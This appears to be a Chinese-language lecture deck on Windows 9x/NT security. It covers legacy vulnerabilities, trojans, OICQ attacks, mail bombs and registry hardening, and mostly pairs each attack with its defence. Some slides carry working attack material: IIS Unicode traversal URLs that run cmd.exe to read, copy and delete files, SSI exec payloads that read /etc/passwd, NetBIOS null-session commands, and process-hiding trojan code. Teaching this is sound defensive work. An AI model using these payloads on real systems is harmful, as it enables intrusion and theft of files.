操作系统安全专业讲座

WINDOWS9x//NT系统安全1BNCC第1页Windows9x漏洞DOS设备名

当用户在Win95/98上接收了一个命令，只要文件或文件夹名称中包含一台DOS设备名时，就会发生系统瓦解；假如在浏览网页时，用户按下了一个包含非法路径（比如包含DOS设备名）链接，也会发生系统瓦解；假如用户在E-mail软件中打开了预览模式，当他收到E-mail，其中夹带一个包含非法路径HTML链接时，他Windows系统也会瓦解。

处理方法：到/security下载安装对应补丁。

2BNCC第2页Windows文件扩展名坑骗漏洞

漏洞描述：

假如命名一个文件名字："file.html

.exe"其中用ASCII255来代替其中空格，那么，在WINDOWS里面将只能看见文件名是：file.html。

而且这个文件名坑骗对IE下载对话框一样存在，恶意者可能连接一个可执行文件，不过让人看起来象一个HTML网页3BNCC第3页Windows快捷方式漏洞Windows快捷方式包含扩展名为lnk、pif、url文件。其中url文件为纯文本格式lnk

和pif文件为二进制文件。这三种快捷方式都能够自定义图标文件，当把图标文件名设定为

Windows默认设备名时，因为设备名称解析漏洞，可造成Windows95/98系统瓦解。因为

对图标搜索是由Explorer自动完成，所以只要快捷方式在资源浏览器中出现，就会导

致系统瓦解。假如快捷方式在桌面上，那么系统一开启就会瓦解。只有以DOS开启系统，在

命令行下删除。因为无法直接设置图标文件名为设备名，只有经过直接编辑方式来创建。

4BNCC第4页Windows快捷方式漏洞对于WindowsNT/系统不会因为设备名称解析而瓦解。但当我们创建一个完全由

ASCII字符填充组成pif文件时会出现以下情况：

1）一个非法pif文件（用ascii字符'x'填充）最少要369字节，系统才认为是一个

正当pif文件，才会以pif图标[pifmgr.dll,0]显示，在属性里有程序、

字体、内存、屏幕”等内容。而且仅仅当一个非pif文件大小是369字节时察看

属性“程序”页时，不会发生程序错误，哪怕是370字节也不行。当对一个大于

369字节非法pif文件察看属性“程序”页时，Explorer会犯错，提醒：

5BNCC第5页Windows快捷方式漏洞"0x77650b82"指令引用"0x000000000"内存。该内存不能为"read"

但这种错误并不会引发缓冲溢出安全问题。初步分析了一下，问题出在pif文件

16进制地址：

0x00000181[0x87]0x00000182[0x01]和

0x00000231[0xC3]0x00000232[0x02]

即使是一个正当pif文件，只要改动这四处任意一处，也会引发程序错误。而只

要把0x00000181和0x00000182值改为[0xFF][0xFF]，那么其它地址任意更改

都不会引发错误。

6BNCC第6页Windows快捷方式漏洞2）当一个大于30857非法pif文件（用ascii字符'x'填充）出现在资源管理器中时，

会使系统CPU资源占用达100%，根本不能察看其属性页。也无法在资源管理器中

对其进行任何操作，甚至不能在命令提醒符中删除。试图删除时会提醒会提醒：

“进程无法访问文件，因为另一个程序正在使用此文件。”

但只要把0x00000181和0x00000182中任意一处改为[0xFF]这种情况就不会发生。

这是因为资源浏览器试图显示其实并不存在图标引发。假如快捷方式在桌面

上，那么系统一开启这种情况就会出现。只有使用任务管理器中止Explorer.exe

进程，再开启一个命令提醒符，从命令行下删除。

此问题仅影响WindowsNT/系统，不影响Windows95/98。7BNCC第7页系统安全漏洞及处理方案NetBIOS信息泄漏netuse\\server\IPC$""/user:""

//此命令用来建立一个空会话netview\\server

//此命令用来查看远程服务器共享资源服务器名称注释

\\pc1

\\pc2

命令成功完成。nettime\\server

//此命令用来得到一个远程服务器当前时间。

8BNCC第8页系统安全漏洞及处理方案nbtstat-Aserver

//此命令用来得到远程服务器NetBIOS用户名字表NetBIOSRemoteMachineNameTable

Name

Type

Status

NULL

<00>UNIQUE

Registered

NULL

<20>UNIQUE

Registered

INTERNET

<00>GROUP

Registered

XIXI

<03>UNIQUE

Registered

INet~Services

<1C>GROUP

Registered

IS~NULL

<00>UNIQUE

Registered

INTERNET

<1E>GROUP

Registered

ADMINISTATOR

<03>UNIQUE

Registered

INTERNET

<1D>UNIQUE

Registered

..__MSBROWSE__.<01>GROUP

RegisteredMACAddress=00-54-4F-34-D8-80

9BNCC第9页系统安全漏洞及处理方案修改注册表一劳永逸HKEY-LOCAL_MACHINE\SYSTEM\CurrentControSet\Control\LSA

ValueName:RestrictAnonymous

DataType:REG_DWORD

Value:1

10BNCC第10页MicrosoftIIS造成网络泄露

telnettarget80

Tryingtarget...

Connectedtotarget.

Escapecharacteris'^]'.

HEAD/directoryHTTP/1.0[CRLF]

[CRLF]

HTTP/1.1401AccessDenied

WWW-Authenticate:Basicrealm="<InternalIPAddress>"

Content-Length:644

Content-Type:text/html

测试程序：

HEAD/directoryHTTP/1.0[CRLF]

[CRLF]

11BNCC第11页MicrosoftWindows98/Folder.htt漏洞(-8-17)

windows98和中，一个名为Folder.htt文件决定了文件夹以何种方式显示为web页面。这个文件包含活动脚本解释执行。假如一个用户任意打开了一个文件夹，同时以web页面形式察看该文件夹选项为enable话（默认选项），则Folder.htt文件中任何代码均会以该用户特权等级运行。经过当地文件夹和远程UNC共享都能够利用此漏洞。

问题出在ShellDefViewActiveX控件。这个控件用来确定对选中文件执行什么操作。为了激活对选中文件默认操作，它使用无任何参数InvokeVerb()方法。文件夹中第一个文件能够经过FileList.focus()方法被自动选中。所以，假如创建一个文件，它默认打开操作为“执行”，而且处于文件列表第一个位置（默认文件排序方式是按字母次序，例11111111.bat会所以被排在首位），则只要打开该文件所在文件夹，就会选中并运行该文件。12BNCC第12页

UNICODE漏洞原理此漏洞从汉字IIS4.0+SP6开始，还影响汉字WIN+IIS5.0、汉字WIN+IIS5.0+SP1，台湾繁体汉字也一样存在这么漏洞。

汉字版WIN中，UNICODE编码存在BUG，在UNICODE编码中

%c1%1c-〉(0xc1-0xc0)*0x40+0x1c=0x5c=‘/‘

%c0%2f-〉(0xc0-0xc0)*0x40+0x2f=0x2f=‘＼‘

NT4中/编码为%c1%9c

在英文版里：WIN英文版%c0%af

但从国外一些站点得来资料显示，还有以下编码能够实现对该漏洞检测.

%c1%pc

%c0%9v

%c0%qf

%c1%8s

%e0%80%af

%f0%80%80%af

%fc%80%80%80%80%af

系统安全漏洞及处理方案

13BNCC第13页系统安全漏洞及处理方案UNICODE编码漏洞简单利用命令1、显示文件内容

假如想显示里面其中一个badboy.txt文本文件，我们能够这么输入（htm,html，asp,bat等文件都是一样）http://x.x.x.x/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+type+c:＼badboy.txt

那么该文件内容就能够经过IE显示出来。

2、建立文件夹命令

http://x.x.x.x/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+md+c:＼badboy运行后我们能够看到

返回这么结果：

CGIError

ThespecifiedCGIapplicationmisbehavedbynotreturningacomplete

setofHTTPheaders.Theheadersitdidreturnare:

14BNCC第14页系统安全漏洞及处理方案3、删除空文件夹命令

http://x.x.x.x/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+rd+c:＼badboy

返回信息同上

4、删除文件命令

http://x.x.x.x/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+del+c:＼badboy.txt

返回信息同上

5、copy文件且更名命令

http://x.x.x.x/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+copy+c:＼badboy.txtbad.txt

返回信息：

CGIError

ThespecifiedCGIapplicationmisbehavedbynotreturningacomplete

setofHTTPheaders.Theheadersitdidreturnare:

1file(s)copied.

15BNCC第15页系统安全漏洞及处理方案显示目标主机当前环境变量

/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+set

返回信息：

CGIError

ThespecifiedCGIapplicationmisbehavedbynotreturningacomplete

setofHTTPheaders.Theheadersitdidreturnare:

ALLUSERSPROFILE=E:＼DocumentsandSettings＼AllUsers

AUTH_TYPE=Negotiate

AUTH_USER=BADBOYCL-DQQZQQ＼badboy

CASL_BASEDIR_ENV=E:＼scan＼CyberCopScanner＼casl

CommonProgramFiles=E:＼ProgramFiles＼CommonFiles

COMPUTERNAME=BADBOYCL-DQQZQQ

ComSpec=E:＼WINNT＼system32＼cmd.exe

16BNCC第16页系统安全漏洞及处理方案CONTENT_LENGTH=0

GATEWAY_INTERFACE=CGI/1.1

HTTP_ACCEPT=*/*

HTTP_ACCEPT_LANGUAGE=zh-cn

HTTP_CONNECTION=Keep-Alive

HTTP_HOST=

HTTP_USER_AGENT=Mozilla/4.0(compatible;MSIE5.01;WindowsNT5.0)

HTTP_AUTHORIZATION=NegotiateTlRMTVNTUAADAAAAGAAYAIgAAAAYABgAoAAAAB4AHgBAAAAADA

AMAF4AAAAeAB4AagAAAAAAAAC4AAAABYKAgEIAQQBEAEIATwBZAEMATAAtAEQAUQBRAFoAUQBRAGIAY

QBkAGIAbwB5AEIAQQBEAEIATwBZAEMATAAtAEQAUQBRAFoAUQBRAODLOAUsBqOAQ3/+AfwqHKj8Q2vz

SAGGgkD6hCEY0EoOIKZVHMr4lmc1Ju37n7SleT==

HTTP_ACCEPT_ENCODING=gzip,deflate

HTTPS=off

INSTANCE_I

17BNCC第17页系统安全漏洞及处理方案7、把某个文件夹内全部文件一次性COPY到另外文件夹

/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+xcopyc:＼badboyc:＼inetpub＼wwwroot

返回信息：

CGIError

ThespecifiedCGIapplicationmisbehavedbynotreturningacomplete

setofHTTPheaders.Theheadersitdidreturnare:

我们查看c:＼inetpub＼wwwroot文件夹，结果全部c:＼badboy内都拷贝到该目录里了

8、把某个文件夹剪贴到指定目录

/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+movec:＼badboyc:＼inetpub＼wwwroot呵呵，还是能够做到，时间长短要看文件多少了。

18BNCC第18页系统安全漏洞及处理方案9、显示某一路径下相同文件类型文件内容

/scripts/..%c1%1c..＼winnt/system32/find.exe?/n+/v+""+c:＼inetpub＼wwwroot＼*.ht*

完全显示出来呀！一样，还有很多命令能够执行，大家能够试试，不过有些时间会很久，有些是不能执行。解释+号，在这里+等于空格键，当然你也能够用空格键，用空格键运行后会转换为%20和%c1%1c=/是同一道理。对于名字超出8个字母文件夹，假如我们想看里面内容时就有点不一样了比如说我们想看目标主机ProgramFiles文件夹里面内容时，应该这么输入

/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir+c:＼progra~1

这里就不能用+或者%20来代替program与files间空格。至于对aabb这么中间带有空格文件夹怎么看，当前我还不知道，假如谁知道能够写出来。19BNCC第19页越权访问drwtsn32.exe（Dr.Watson）是一个Windows系统内置程序错误调试器。默认

状态下，出现程序错误时，Dr.Watson将自动开启，除非系统上安装了VC等其它含有调试功效软件更改了默认值。注册表项：

[HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsNT\CurrentVersion\AeDebug]

下Debugger项值指定了调试器及使用命令；Auto项决定是否自动诊疗错误，并统计对应诊疗信息。

[HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsNT\CurrentVersion\AeDebug]

20BNCC第20页越权访问在Windows中drwtsn32.exe默认会将故障转储文件user.dmp存放在目录“\DocumentsandSettings\AllUsers\Documents\DrWatson”下。权限为Everyone完全控制。在WindowsNT中被存放在“\WINNT\”中，everyone组最少有读取权限。

因为user.dmp中存放内容是当前用户部分内存镜像，所以可能造成各种敏感信息泄漏，比如帐号、口令、邮件、浏览过网页、正在编辑文件等等，详细取决于瓦解应用程序和在此之前用户进行了那些操作。

21BNCC第21页越权访问drwtsn32参数

drwtsn32[-i][-g][-ppid][-eevent][-?]

-i将DrWtsn32看成默认应用程序错误调试程序

-g被忽略，但作为WINDBG和NTSD兼容而被提供

-ppid要调试进程id

-eevent表示进程附加完成事件

-?这个屏幕

22BNCC第22页木马程序原理木马分类

木马程序技术发展至今，已经经历了4代，第一代，即是简单密码窃取，发送等，没有什么尤其之处。第二代木马，在技术上有了很大进步，冰河能够说为是国内木马经典代表之一。第三代木马在数据传递技术上，又做了不小改进，出现了ICMP等类型木马，利用畸形报文传递数据，增加了查杀难度。第四代木马在进程隐藏方面，做了大改动，采取了内核插入式嵌入方式，利用远程插入线程技术，嵌入DLL线程。或者挂接PSAPI,实现木马程序隐藏，甚至在WindowsNT/下，都到达了良好隐藏效果。相信，第五代木马很快也会被编制出来。。

23BNCC第23页木马程序原理木马程序隐藏技术

进程：一个正常Windows应用程序，在运行之后，都会在系统之中产生一个进程，同时，每个进程，分别对应了一个不一样PID（ProgressID,进程标识符）这个进程会被系统分配一个虚拟内存空间地址段，一切相关程序操作，都会在这个虚拟空间中进行。

线程：一个进程，能够存在一个或多个线程，线程之间同时执行各种操作，普通地，线程之间是相互独立，当一个线程发生错误时候，并不一定会造成整个进程瓦解。

服务：一个进程当以服务方式工作时候，它将会在后台工作，不会出现在任务列表中，不过，在WindowsNT/下，你依然能够经过服务管理器检验任何服务程序是否被开启运行。

24BNCC第24页木马程序原理WINAPIWinMain(HINSTANCE,HINSTANCE,LPSTR,int)

{

try

{

DWORDdwVersion=GetVersion();

//取得Windows版本号

if(dwVersion>=0x80000000)

//Windows9x隐藏任务列表

{

int(CALLBACK*rsp)(DWORD,DWORD);

HINSTANCEdll=LoadLibrary("KERNEL32.DLL");

//装入KERNEL32.DLL

rsp=(int(CALLBACK*)(DWORD,DWORD))GetProcAddress(dll,"RegisterServiceProcess");

//找到RegisterServiceProcess入口

rsp(NULL,1);

//注册服务

FreeLibrary(dll);

//释放DLL模块

}

}

catch(Exception&exception)

//处理异常事件

{

//处理异常事件

}

return0;

}25BNCC第25页木马程序原理程序自加载运行技术1、集成到程序中6、在System.ini中藏身2、隐藏在配置文件中

7、隐形于开启组中3、潜伏在Win.ini中8、隐蔽在Winstart.bat中4、伪装在普通文件中9、捆绑在开启文件中5、内置到注册表中10、设置在超级连接中

26BNCC第26页木马程序原理木马程序建立连接隐藏

合并端口法，也就是说，使用特殊伎俩，在一个端口上同时绑定两个TCP或者UDP连接，这听起来不可思议，但实际上确实如此，而且已经出现了使用类似方法程序，经过把自己木马端口绑定于特定服务端口之上，（比如80端口HTTP，谁怀疑他会是木马程序呢？）从而到达隐藏端口目地。另外一个方法，是使用ICMP（InternetControlMessageProtocol）协议进行数据发送,原理是修改ICMP头结构，加入木马控制字段，这么木马，具备很多新特点，不占用端口特点，使用户难以发觉，同时，使用ICMP能够穿透一些防火墙，从而增加了防范难度。之所以含有这种特点，是因为ICMP不一样于TCP，UDP，ICMP工作于网络应用层不使用TCP协议。27BNCC第27页木马程序原理木马程序建立连接隐藏

28BNCC第28页木马程序原理目标机器情况获取

服务器端程序包装与加密

进入Windows命令行模式下做以下操作

1）C:\>copyServer.ExeServer.Bak

2）建立一个文本文件Test.Txt，其内容为“”

3）C:\>typeText.Txt>>Server.Exe

4）运行Server.Exe

29BNCC第29页浏览网页也会中木马1.MIME介绍

MIME(MultipurposeInternetMailExtentions)，普通译作“多用途网际邮件扩充协议”。顾名思义，它能够传送多媒体文件，在一封电子邮件中附加各种格式文件一起送出。现在它已经演化成一个指定文件类型(Internet任何形式消息：e-mail，usenet新闻和Web)通用方法。在使用CGI程序时你可能接触过MIME类型，其中有一行叫作Content-type语句，它用来指明传递就是MIME类型文件(如text/html或text/plain)。30BNCC第30页浏览网页也会中木马IE是怎样处理附件：普通情况下假如附件是文本文件，IE会读它，假如是VIDEOCLIP，IE会查看它；假如附件是图形文件，IE就会显示它；假如附件是一个EXE文件呢？IE会提醒用户是否执行！但令人恐惧是，当攻击者更改MIME类型后，IE就不再提醒用户是否执行而直接运行该附件！从而使攻击者加在附件中程序、攻击命令能够按照攻击者构想情况进行。31BNCC第31页OICQ安全纵观针对OICQ攻击，主要分为IP探测、消息炸弹、密码和当地消息破解、木马植入及其它方式。推出该安全手册目标是为了能让大多数对网络安全不熟悉网民们能够简单防御这些攻击。32BNCC第32页OICQ安全IP探测

因为OICQ采取是UDP数据包通讯，攻击者只要向你发送一个信息，他就能够经过监视UDP数据包来取得你IP和OICQ端口号，从理论上说，在直接通讯模式下，想防止攻击者发觉你IP地址是十分困难。

IP探测另一个方法是经过端口扫描，OICQ通讯端口值默认情况下是8000，攻击者能够经过集中扫描某一地址段8000端口来取得那些正在使用OICQIP地址。

33BNCC第33页OICQ安全防范IP探测主要方法是：一、阻止攻击者与你直接通讯，在OICQ个人设定里修改身份验证默认值为"需要身份认证才能把我加为挚友"，这么攻击者也还是能够经过一些特殊信息发送软件跟你通讯，所以你还应该在系统参数设置里把拒绝陌生人消息选项选上。另一个阻止攻击者与你直接通讯方法是经过代理上OICQ或者隐身登陆，这么攻击者所看到IP地址是代理服务巧删OICQ登录号码器IP，隐身登陆消息传递是经过服务器中转，这么传给攻击者数据包IP地址是腾讯服务器地址。

修改OICQ通讯端口默认值是防止被攻击者扫描唯一方法，它还能预防攻击者给你发送垃圾消息。34BNCC第34页OICQ安全消息炸弹

消息炸弹攻击原理是利用UDP数据通讯不需要验证确认弱点，只要拿到用户IP地址和OICQ通讯端口即可发动攻击。

35BNCC第35页OICQ安全密码和当地消息破解

经过暴力解密是一个破解伎俩，有些攻击者还采取一些键盘统计程式来统计你输入帐号和密码，让你防不胜防。

另一个取得OICQ密码伎俩是经过攻击你注册邮箱，因为腾讯有一个忘记密码功效，它将用户OICQ密码发送到用户注册时邮箱里，攻击者一旦拿到这个邮箱，即能够很简单拿到你密码。

36BNCC第36页OICQ安全一、当地破解防范破解密码通常是穷举。不要用简单英文和纯数字作为密码，应该是大小写、数字、符号混合，不要少于八位，这么话密码就不轻易被破了二、攻击注册邮箱防范

个人资料里和你申请号码时所填mail地址不要一样，除非你对你密码很有信心。选择一个好密码也是一个好方法！37BNCC第37页OICQ木马程序剖析GOP木马程序GOP木马检验

该木马运行时候在Windows任务窗口中是看不到,你能够点任务条上“开始”、“运行”、“msinfo32”(就是Windows自带系统信息，在“附件”中)。看其中软件环境→正在运行任务。这才是Windows现在全部运行任务。当你在运行了什么东西之后以为有问题时候就看看这里。假如有一个项目有程序名和路径，而没有版本、厂商和说明，你就应该担心一下了。GOP木马在这里显示版本为：“不能用”。假如你发觉GOP木马，先关掉你猫(断网)，然后脱机重新登录一次你OICQ，查找电脑中是否有record.dat文件(每个盘都应该查一下！绝不放过！)(这是GOP统计OICQ密码文档，假如你OICQ密码被监控到了就一定会有。当然，即使你中了木马，在你还没有用OICQ时候是不会有这个文件。反正现在不在网上，不用担心密码被发走)。假如有话，那么“恭喜”你了，100%中了木马。不信？用记事本打开那个record.dat，看看有没有你宝贝OICQ号码和密码。

你还能够运行系统配置实用程序(开始―运行―msconfig)，在开启栏里，你亦可发觉“WindowsAgent”(就是上文提到“定义注册表键名”,可能会是其它键名)38BNCC第38页OICQ木马程序GOP木马去除在注册表HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run主键下添加一个键值来让木马自动运行，该木马也不例外。运行regedit，进入HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run主键，记住那个在系统信息中查到那个文件，也可在msconfig―开启―名称里找到(在“剖析木马设置”中，我们知道木马文件名是能够任意定制，所以无法确定详细文件名)存放路径，删除该键值。然后关闭计算机，稍候一下开启计算机(注意：不要选重新开启)。然后进入文件存放路径删除木马文件即可。

39BNCC第39页恶意程序邮件炸弹原理E-MAIL炸弹原本泛指一切破坏电子邮箱方法，普通电子邮箱容量在5，6M以下，平时大家收发邮件，传送软件都会以为容量不够，假如电子邮箱一下子被几百，几千甚至上万封电子邮件所占据，这是电子邮件总容量就会超出电子邮箱总容量，以至造成邮箱超负荷而瓦解。【kaboom3】【upyours4】【Avalanchev2.8】40BNCC第40页恶意程序邮件炸弹防范⒈不要将自己邮箱地址处处传输，尤其是申请上网帐号时ISP送电子信箱，那可是要按字节收费哟！去申请几个无偿信箱对外使用，随便他人怎么炸，大不了不要了。

⒉最好用POP3收信，你能够用Outlook或Foxmail等POP收信工具收取Email。比如用Outlook，你能够选择“工具”/“收件箱助理”，然后点击“添加”在属性窗口能够设定对各种条件Email处理方式。41BNCC第41页恶意程序邮件炸弹防范⒊当某人不停炸你信箱时，你能够先打开一封信，看清对方地址，然后在收件工具过滤器中选择不再接收这地址信，直接从服务器删除。4。在收信时，一旦看见邮件列表数量超出平时正常邮件数量若干倍，应该马上停顿下载邮件，然后再从服务器删除炸弹邮件。⒌不要认为邮件发送有个回复功效，就能够将发炸弹人报复回来，那是十分愚蠢！发件人有可能是用假地址发信，这个地址可能填得与收件人地址相同。这么你不但不能回报对方，还会使自己邮箱彻底完结！

42BNCC第42页恶意程序邮件炸弹防范⒍你还能够用一些工具软件预防邮件炸弹，下面本站就提供一个供大家下载：【echom201】这是一个功效强大砍信机，每分钟能砍到1000封电子邮件，是对付邮件炸弹好东西

43BNCC第43页恶意程序端口攻击原理这类软件是利用Window95/NT系统本身漏洞，这与Windows下微软网络协议NetBIOS一个例外处理程序OOB（OutofBand）相关。只要对方以OOB方式，就能够经过TCP/IP传递一个小小封包到某个IP地址Port139上，该地址电脑系统即（WINDOWS95/NT）就会“应封包而死”，自动重新开机，你未存档全部工作就得重新再做一遍了。44BNCC第44页恶意程序端口攻击防范常见端口攻击器有【uKe23】【voob】【WINNUKE2】。假如你还是用win95，那您就要当心了。防范将你Windows95马上升级到Windows98，首先修正Win95BUG，在微软主页附件中有对于Win95和OSR2以前版本补丁程序，Win98不需要。然后学会隐藏自己IP，包含将ICQ中"IP隐藏"打开，注意防止在会显示IPBBS和聊天室上暴露真实身份，尤其在去黑客站点访问时最好先运行隐藏IP程序。45BNCC第45页恶意程序JAVA炸弹原理很多人在聊天室中被炸了以后，就认为是被他人黑了，其实不是。炸弹有很各种，有是造成电脑直接死机，有是经过HTML语言，让你浏览器吃完你系统资源，然后你就死机了。46BNCC第46页恶意程序JAVA炸弹防范唯一防范方法就是你在聊天室聊天时，尤其是支持HTML聊天室（比如湛江，新疆等）请你一定记住关掉你浏览器里java功效，还要记住不要浏览一些来路不明网站和不要在聊天室里按其它网友发出超级链接，这么能够防止遭到恶作剧者攻击.47BNCC第47页恶意程序浏览主页硬盘共享“万花谷”，假如进入该网页浏览者注册表会被修改，好多系统功效所以受到限制。最近又听说有网友在浏览网页时硬盘被共享，危害似乎更大！其实，所谓浏览网页硬盘被共享，和“万花谷”一样，受害者都是在浏览了含有有害代码ActiveX网页文件后中招。48BNCC第48页恶意程序浏览主页硬盘共享防御防范：1、不要轻易去一些自己并不了解站点，尤其是那些看上去漂亮诱人网址更不要贸然前往，不然吃亏往往是你。

2、运行IE，点击“工具→Internet选项→安全→Internet区域安全级别，把安全极别由“中”改为“高”

3、因为该类网页是含有有害代码ActiveX网页文件，所以在IE设置中将ActiveX插件和控件、Java脚本等全部禁止就能够防止中招。详细方法是：在IE窗口中点击“工具→Internet选项，在弹出对话框中选择“安全”标签，再点击“自定义级别”按钮，就会弹出“安全设置”对话框，把其中全部ActiveX插件和控件以及Java相关全部选择“禁用”即可。不过，这么做在以后网页浏览过程中可能会造成一些正常使用ActiveX网站无法浏览。唉，有利就有弊，你还是自己看着办吧。

4、对于Windows98用户，请打开C:\WINDOWS\JAVA\Packages\CVLV1NBB.ZIP，把其中“ActiveXComponent.class”删掉；对于WindowsMe用户，请打开C:\WINDOWS\JAVA\Packages\5NZVFPF1.ZIP，把其中“ActiveXComponent.class”删掉。请放心，删除这个组件不会影响到你正常浏览网页。

49BNCC第49页恶意程序5、既然这类网页是经过修改注册表来破坏我们系统，那么我们能够事先把注册表加锁：禁止修改注册表，这么就能够到达预防目标。不过，自己要使用注册表编辑器regedit.exe该怎么办呢？所以我们还要在以前事先准备一把“钥匙”，方便打开这把“锁”！加锁方法以下：

(1)运行注册表编辑器regedit.exe；

(2)展开注册表到HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System下，新建一个名为DisableRegistryToolsDWORD值，并将其值改为“1”，即可禁止使用注册表编辑器regedit.exe。解锁方法以下：

用记事本编辑一个任意名字.reg文件，比如unlock.reg，内容以下：REGEDIT4[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System]

"DisableRegistryTools"=dword:00000000

50BNCC第50页恶意程序

6、安装网络防火墙，尤其是安装了Norton后，进入该类网页就会报警提醒有脚本写注册表，国产反病毒软件KVW3000也有这类功效，提议你也安装一个这么软件。

7、即使经过一番辛劳劳动修改回了标题和默认连接首页，但假如以后又不小心进入该站就又得麻烦一次。其实，你能够在IE中做一些设置方便永远不进该站点：

打开IE，点击“工具”→“Internet选项”→“内容”→“分级审查”，点“启用”按钮，会调出“分级审查”对话框，然后点击“许可站点”标签，输入不想去网站网址，如输入：，按“从不”按钮，再点击“确定”即大功告成！51BNCC第51页恶意程序网页执行exe文件

在服务器端执行文件是靠SSI来实现，SSI是服务器端包含意思（不是SSL），我们经常使用#include就是服务器端包含指令之一。不过，这次要介绍就是#exec。就是他能够实现服务器端执行指令。

不过，不能用于.asp文件。而只能stm、.shtm和.shtml这些扩展名。而能解释执行他们就是Ssinc.dll。所以，你写好代码必须保留成.stm等格式才能确保服务器能执行。

52BNCC第52页恶意程序网页执行exe文件SSI有什么用?

当前，主要有以下几个用用途：

1、显示服务器端环境变量<#echo>

2、将文本内容直接插入到文档中<#include>

3、显示WEB文档相关信息<#flastmod#fsize>(如文件制作日期/大小等)

4、直接执行服务器上各种程序<#exec>(如CGI或其它可执行程序)

5、设置SSI信息显示格式<#config>(如文件制作日期/大小显示方式)

高级SSI<XSSI>可设置变量使用if条件语句。

53BNCC第53页恶意程序<!--#execcmd=”cat/etc/passwd”-->将会显示密码文件<!--#execcmd=”dir/b”-->将会显示当前目录下文件列表<!--#execcgi=”/cgi-bin/gb.cgi”-->将会执行CGI程序gb.cgi。<!--#execcgi=”/cgi-bin/access_log.cgi”-->将会执行CGI程序access_log.cgi54BNCC第54页恶意程序防范方法access.conf中”OptionsIncludesExecCGI”这行代码删除；在IIS中，要禁用#exec命令，可修改SSIExecDisable元数据库；55BNCC第55页Windows注册表注册表介绍注册表修改56BNCC第56页注册表基本概念所谓注册表就是一个庞大数据库，其中容纳了应用程序和计算机系统全部配置信息，Windows9x系统和应用程序初始化信息，应用程序和文档文件关联关系，硬件设备说明，状态和属性以及各种状态信息和数据。他有两个部分组成：注册表数据库（包含两个文件：SYSTEM.DAT和USER.DAT）和注册表编辑器。SYSTEM.DAT是用来保留微机系统信息，如安装硬件和设备驱动程序相关信息

USER.DAT是用来保持每个用户特有信息，如桌面设置，墙纸和窗口颜色设置等。他们自备份文件为SYSTEM.DAO和。注册表编辑器则是来对注册表进行各种编辑工作。57BNCC第57页注册表结构系统对注册表预定了六个主管键字：HKEY_CLASSES_ROOT：文件扩展名与应用关联及OLE信息

HKEY_USERS：用户依据个人兴趣设置信息。HKEY_CURRENT_USER：当前登录用户控制面板选项和桌面等设置，以及映射网络驱动器

HKEY_LOCAL_MACHINE：计算机硬件与应用程序信息

HKEY_DYN_DATA：即插即用和系统性能动态信息

HKEY_CURRENT_CONFIG：计算机硬件配置信息

58BNCC第58页注册表结构注册表中键值项数据注册表经过键和子键来管理各种信息。不过注册表中全部信息都是以各种形式键值项数据保留。在注册表编辑器右窗格中显示都是键值项数据。这些键值项数据能够分为三种类型：

1.字符串值

在注册表中，字符串值普通用来表示文件描述和硬件标识。通常由字母和数字组成，也能够是汉字，最大长度不能超出255个字符。在本例中以"a"="***"表示。

59BNCC第59页注册表结构2.二进制值

在注册表中二进制值是没有长度限制，能够是任意字节长。在注册表编辑器中，二进制以十六进制方式表示。在本站中以"a"=hex:01,00,00,00方式表示。

3.DWORD值

DWORD值是一个32位(4个字节)数值。在注册表编辑器中也是以十六进制方式表示。在本站中以"a"=dword:00000001表示。60BNCC第60页注册表双重入口问题

在注册表中经常出现双重入口（分支），比如，有一些在HKEY_CLASSES_ROOT中键一样会在HKEY_LOCAL_MACHINE中出现。注册表中经常出现双重入口（分支），比如，有一些在HKEY_CLASSES_ROOT中键一样会在HKEY_LOCAL_MACHINE中出现。

假如这些相同分支出现在两个不一样根键中，那么，哪个根键有效呢?

注册表子键都有严格组织。一些相同信息会出现在超出一个子键中，假如您只修改了一个子键，那么该修改是否作用于系统依赖于该子键等级。普通来说，系统信息优先于用户等级。比如，一个设置项同时出现在HKEY_LOCAL_MACHINE和HKEY_USER子键中，通常由HKEY_LOCAL_MACHINE中数据起作用。要注意是，这种情况只发生在您直接编辑注册表时。假如您从“控制面板”中更改系统配置，则全部出现该设置项地方均会发生对应改变。

61BNCC第61页注册表修改

一、直接修改注册表基本方法对于熟悉注册表项设置高级用户，如果使用控制面板和策略文件不能达到目，也就只能采用这种最直接、最全面处理方法。具体使用方法是Regedit.exe(注册表编辑器)到本地硬盘上运行，去掉注册表只读方式，对系统注册表项进行修改，完成后应存盘退出。下次系统启动时，新设置就会生效。

62BNCC第62页注册表修改二、间接修改注册表简易方法在注册表文本文件首行必须用命令字符串“REGEDIT”，其作用是通知系统调用regedit来完成注册信息合并工作。接下来每一行或代表一个键值声明或者为注释性说明信息。主键及其默认键值声明格式为：根键\一级主键\二级主键\=默认键值63BNCC第63页注册表修改

三、备份注册表方法不少安装程序(或你自己直接处理)都可能搞乱你系统注册表，从而引发不测，所以我们应该定期地备份user.dat和system.dat文件。但目前资源管理器(或者是DOS来)都不能直接复制这两个文件.64BNCC第64页注册表安全实例1、让用户名不出现在登录框中

Win9x以上操作系统能够对以前用户登录信息含有记忆功效，下次重新开启计算机时，我们会在用户名栏中发觉上次用户登录名，这个信息可能会被一些非法分子利用，而给用户造成威胁，为此我们有必要隐藏上机用户登录名字。设置时，请用鼠标依次访问键值HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Winlogon，并在右边窗口中新建字符串"DontDisplayLastUserName",并把该值设置为"1"，设置完后，重新开启计算机就能够隐藏上机用户登录名字。

65BNCC第65页注册表安全实例2、抵抗BackDoor破坏

